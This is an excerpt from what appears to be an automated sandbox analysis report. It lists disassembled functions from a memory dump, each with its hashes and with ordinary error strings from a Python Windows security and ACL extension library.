                                                                                                                                                                                                                                                                                      • String ID: <NULL!!>$Buffer cannot be None$Buffer length can be at most %d characters$Getting WCHAR string$None is not a valid string in this context$Objects of type '%s' can not be converted to Unicode.$O|i$string too small - must be at least %d bytes (got %d)
                                                                                                                                                                                                                                                                                      • API String ID: 4105764891-2902820477
                                                                                                                                                                                                                                                                                      • Opcode ID: 617d2196de1cec3ed8d6d8ab3add72d5df5a5d96e77225db4f40206af1f54af4
                                                                                                                                                                                                                                                                                      • Instruction ID: 3c6ec5e9251a7622033347f63fc9d7de783b8220816fef0afd89409e2d349377
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 617d2196de1cec3ed8d6d8ab3add72d5df5a5d96e77225db4f40206af1f54af4
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1081C726A09B4295FB548FA9D8542BC23A1AF48FC8F845436DF0E576B6EF3CE545C340
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Err_$DescriptorSecurity$String$Arg_Buffer_ParseReleaseTuplefreemalloc$BufferClearControlDeallocFormatInitializeLengthObject_OccurredReferenceValid
                                                                                                                                                                                                                                                                                      • String ID: Buffer cannot be None$Buffer length can be at most %d characters$Data is not a valid security descriptor$O:SECURITY_DESCRIPTOR$Security descriptor created from a buffer must be self relative$Security descriptors are not supported on this platform$|l:SECURITY_DESCRIPTOR
                                                                                                                                                                                                                                                                                      • API String ID: 929864077-2729865943
                                                                                                                                                                                                                                                                                      • Opcode ID: 907e45069e2a562dd984d1ee0477dffeda1de1be7776d16703d8a25f67731b20
                                                                                                                                                                                                                                                                                      • Instruction ID: d6469658fbac9a8bfceaac23c198b84a1ee8719e07742fa3b144c692fd4e8faa
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 907e45069e2a562dd984d1ee0477dffeda1de1be7776d16703d8a25f67731b20
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 14610522A18B4292FB509B9DE99027D63A1BF85FC0F944035EB4E57AB6EF3CE445C300
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: AbsoluteErr_FormatMakemallocmemset
                                                                                                                                                                                                                                                                                      • String ID: ($MakeAbsoluteSD$Unable to allocate %d bytes
                                                                                                                                                                                                                                                                                      • API String ID: 1436552674-2130869594
                                                                                                                                                                                                                                                                                      • Opcode ID: 817e4bd11004b34f0d9ee0657aa47416c8f7398feaa8474a98fd3fe14e7fbdd3
                                                                                                                                                                                                                                                                                      • Instruction ID: f7afb32747edae3d71e4a349b1f67255e62d68d922ac0671e6ea998d16156326
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 817e4bd11004b34f0d9ee0657aa47416c8f7398feaa8474a98fd3fe14e7fbdd3
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CF811A32A09B428AFB55CFAAA8406AD37A1BF48FD8F444435EE4D57B65EF3CD4448700
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: BuildErr_StringValue$CharFromUnicode_Wide
                                                                                                                                                                                                                                                                                      • String ID: AccessMode$AccessPermissions$Identifier$Inheritance$Invalid value for TrusteeForm$MultipleTrustee$MultipleTrusteeOperation$Trustee$TrusteeForm$TrusteeForm not yet supported$TrusteeType${s:O,s:l,s:l,s:l,s:N}${s:l,s:l,s:l,s:N}
                                                                                                                                                                                                                                                                                      • API String ID: 4150572817-4268317626
                                                                                                                                                                                                                                                                                      • Opcode ID: c98c665ab8a0a4017fd0a264350303892bf8c1112e9847fedee4e5de0a27f4e9
                                                                                                                                                                                                                                                                                      • Instruction ID: cb879e31a764bdf946eb30bcd986a7f64a9480c18552e11e0b0fb5bb80b9de52
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c98c665ab8a0a4017fd0a264350303892bf8c1112e9847fedee4e5de0a27f4e9
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 50510636A08B428AEA608F59E44016D73A8FF48FE4F544235EB4E87775DF3CE6558740
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Err_$Format$AccessAuditObjectfree$Arg_ErrorLastLengthParseStringTuplemallocmemcpymemset
                                                                                                                                                                                                                                                                                      • String ID: %s: adding ACE would put ACL over size limit$AddAuditAccessObjectAce$AddAuditAccessObjectAce not supported by this version of Windows$AddAuditAccessObjectAce: unable to allocated %d bytes$PyACL::AddAuditAccessObjectAce$The object is not a PySID object$lllOOOii:AddAuditAccessObjectAce
                                                                                                                                                                                                                                                                                      • API String ID: 282185603-1609464327
                                                                                                                                                                                                                                                                                      • Opcode ID: 26eaf46bba8aa332da59d73b146c913fc64544bd534984a4cf7e3efad4388a83
                                                                                                                                                                                                                                                                                      • Instruction ID: 6a912c3d8bc8235a50eb2ac0a83af89160f5952e62ba55bc3cb485935b59d8b6
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 26eaf46bba8aa332da59d73b146c913fc64544bd534984a4cf7e3efad4388a83
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6381F822B19B4286EB50CBA9E8505AD73A5BF48FC4F444136EE4E47BA9DF3CE409C740
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Err_$Arg_FormatParseStringTuple
                                                                                                                                                                                                                                                                                      • String ID: %s: adding ACE would put ACL over size limit$AddAuditAccessAceEx$AddAuditAccessAceEx not supported by this version of Windows$AddAuditAccessAceEx: unable to allocated %d bytes$PyACL::AddAuditAccessAceEx$The object is not a PySID object$lllOii:AddAuditAccessAceEx
                                                                                                                                                                                                                                                                                      • API String ID: 901859003-3541680958
                                                                                                                                                                                                                                                                                      • Opcode ID: dd1c56f6490d01056c0aa620be259863251a6bb8c3dca21ebab00ade8506534f
                                                                                                                                                                                                                                                                                      • Instruction ID: 4982fa0eb1dfac293f2dcf24ec2c7971edd095df349e416e5a38ccaa2d06a654
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: dd1c56f6490d01056c0aa620be259863251a6bb8c3dca21ebab00ade8506534f
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4261E926A08B4292EA60CB59E89026E73A5FF85FC4F544036EB4D87B75DF3DE549C700
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Err_$DeallocFormatString$CharFreeMem_Sequence_TupleUnicode_Widefreemallocmemset
                                                                                                                                                                                                                                                                                      • String ID: <NULL!!>$Getting WCHAR string$None is not a valid string in this context$Objects of type '%s' can not be converted to Unicode.$Sequence can contain at most %d items$Unable to allocate %d bytes
                                                                                                                                                                                                                                                                                      • API String ID: 1433913835-2102981847
                                                                                                                                                                                                                                                                                      • Opcode ID: 8535e905c18311b126149db4c654d6e50bde341e448ca8767d7c62fbaddd82d7
                                                                                                                                                                                                                                                                                      • Instruction ID: 7f084f0311a03f170b3e990d2c70e1ccd00ca5c7dbc0e1255378018d4b677a39
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8535e905c18311b126149db4c654d6e50bde341e448ca8767d7c62fbaddd82d7
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B561CE32A08B4686EA508F9EE84417D77A0BF89FD4F894135EB4D47772EE3DE4498700
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Err_$AccessAuditFormatfree$Arg_ErrorLastLengthParseStringTuplemallocmemcpymemset
                                                                                                                                                                                                                                                                                      • String ID: %s: adding ACE would put ACL over size limit$AddAuditAccessAce$AddAuditAccessAce: unable to allocated %d bytes$PyACL::AddAuditAccessAce$The object is not a PySID object$llOii:AddAuditAccessAce
                                                                                                                                                                                                                                                                                      • API String ID: 3041754842-240227349
                                                                                                                                                                                                                                                                                      • Opcode ID: 41c427efde199c7782ebfe022160a6b9792f91ee7cbc64d9b07f2f7f8afba0ed
                                                                                                                                                                                                                                                                                      • Instruction ID: 6c0ed2fd41f0633af2a55fe8a9ccd16487e00eb87624c99a9aea20e8146c32ee
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 41c427efde199c7782ebfe022160a6b9792f91ee7cbc64d9b07f2f7f8afba0ed
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F3512922A08B4286EB50CF5AE84457D63A1BF84FC4F544035EB5E87BB5DE3CE9498740
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: free$DescriptorSecurity$Err_Group$Arg_DaclFormatOwnerParseSaclStringTupleValidmalloc
                                                                                                                                                                                                                                                                                      • String ID: Oi:SetSecurityDescriptorOwner$SetSecurityDescriptorGroup$SetSecurityDescriptorGroup - invalid sid$The object is not a PySID object
                                                                                                                                                                                                                                                                                      • API String ID: 1524979833-2851344522
                                                                                                                                                                                                                                                                                      • Opcode ID: c300119cf340fa15e331d90d47fc04b330e8a1bbcced3dc3e73c2575c99f7ea4
                                                                                                                                                                                                                                                                                      • Instruction ID: 5abbeed767bf4630f6a6f06a0be74b21efec9d65fea3e92ef38cd1c98406efc3
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c300119cf340fa15e331d90d47fc04b330e8a1bbcced3dc3e73c2575c99f7ea4
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 40512A26B28B0295FB559FA9E8402BD23A4BF44FC8F884432EF0E566B5DE3CE445D340
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: String$Err_$CharUnicode_Wide
                                                                                                                                                                                                                                                                                      • String ID: <NULL!!>$Attributes of PyDEVMODEW can't be deleted$FormName must be a string of length %d or less$Getting WCHAR string$None is not a valid string in this context$Objects of type '%s' can not be converted to Unicode.$value is larger than a DWORD
                                                                                                                                                                                                                                                                                      • API String ID: 3849944921-358745228
                                                                                                                                                                                                                                                                                      • Opcode ID: bdc3e7128bf631bb1fbc859662b68c46382314d96899fc7225cfab469126a8c4
                                                                                                                                                                                                                                                                                      • Instruction ID: be104e6d48d74c28ffa0ef059ae053fbd57cce149603394b0f5d3cd65201736a
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bdc3e7128bf631bb1fbc859662b68c46382314d96899fc7225cfab469126a8c4
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8D41E566E18B4282EA508F9EE49017D2360FF89FD4F545132EB4E4B6B6DF3DE8858300
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: String$Err_$CharUnicode_Wide
                                                                                                                                                                                                                                                                                      • String ID: <NULL!!>$Attributes of PyDEVMODEW can't be deleted$DeviceName must be a string of length %d or less$Getting WCHAR string$None is not a valid string in this context$Objects of type '%s' can not be converted to Unicode.$value is larger than a DWORD
                                                                                                                                                                                                                                                                                      • API String ID: 3849944921-3701856451
                                                                                                                                                                                                                                                                                      • Opcode ID: 1339cf3604d15a9370892e0da6ac1f78a1d8c00d4b1d96f8de384227f0a6a403
                                                                                                                                                                                                                                                                                      • Instruction ID: 05ece6ef85dff88c44ac98607e9cf9969cc3e1004d447bf4cf7aba0afdcb4ec2
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1339cf3604d15a9370892e0da6ac1f78a1d8c00d4b1d96f8de384227f0a6a403
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4B41F762E08B4282EA509F9EE89027D6361FF89FD4F545132EB5E476B6DE3CE4858300
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Err_String$CharClearFreeMem_Unicode_Wide
                                                                                                                                                                                                                                                                                      • String ID: <NULL!!>$None is not a valid string in this context$Objects of type '%s' can not be converted to Unicode.$Only strings and iids can be converted to a CLSID.$value is larger than a DWORD
                                                                                                                                                                                                                                                                                      • API String ID: 443722841-2914159855
                                                                                                                                                                                                                                                                                      • Opcode ID: 37b0708b124ef805f6eafb4413cb45e7aa50632965b2a1696fc48efc4bb87208
                                                                                                                                                                                                                                                                                      • Instruction ID: 715b6344bd1240b80d30a0c3d2d2ffbc1289d258ef974414d8984fe18dd55bd0
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 37b0708b124ef805f6eafb4413cb45e7aa50632965b2a1696fc48efc4bb87208
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BA410666A08B4282FB108B9DE45427D63A1BF88FD8F884131EB5E477B6EF7CE4458301
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Err_$Buffer_CharFormatFromReleaseUnicode_Wide$Arg_BufferBuildDeallocMessageObjectObject_ParseStringTupleValuewsprintf
                                                                                                                                                                                                                                                                                      • String ID: Buffer cannot be None$Buffer length can be at most %d characters$COM Error 0x%x$iNzz
                                                                                                                                                                                                                                                                                      • API String ID: 2036073046-2401320735
                                                                                                                                                                                                                                                                                      • Opcode ID: 4fed1c0e6664d21868abd63e6797ee29565fbc786b664ad84a8487749ffcb9f1
                                                                                                                                                                                                                                                                                      • Instruction ID: 7db14598dbca1b8fff7f84758fe4ef632cd145a80412b05721406d1bfa46cb07
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4fed1c0e6664d21868abd63e6797ee29565fbc786b664ad84a8487749ffcb9f1
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 48612B22A08B4286EB608B69E85427D63A0FF89FD4F985135EB4E476F6DF3CE4458700
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: DescriptorSecurityfree$Err_SaclString$Arg_DaclGroupLengthOwnerParseTupleValid
                                                                                                                                                                                                                                                                                      • String ID: SetSecurityDescriptorSacl$The object is not a PyACL object$iOi:SetSacl
                                                                                                                                                                                                                                                                                      • API String ID: 1467358711-1973599164
                                                                                                                                                                                                                                                                                      • Opcode ID: ca031ff84b3ac6ab0230af49dea1aa47d77822ddcdcf60e7dd2b298a8373459c
                                                                                                                                                                                                                                                                                      • Instruction ID: 01ae103830729fed8972196ae649830377c9be012fee370fc320ac013c179fd3
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ca031ff84b3ac6ab0230af49dea1aa47d77822ddcdcf60e7dd2b298a8373459c
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F4511726B28B5295FB519FA9D8405BD23A1BF44FC8F884432EF0E66A65DF3CE549C300
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: DescriptorSecurityfree$Err_OwnerString$Arg_DaclGroupLengthParseSaclTupleValid
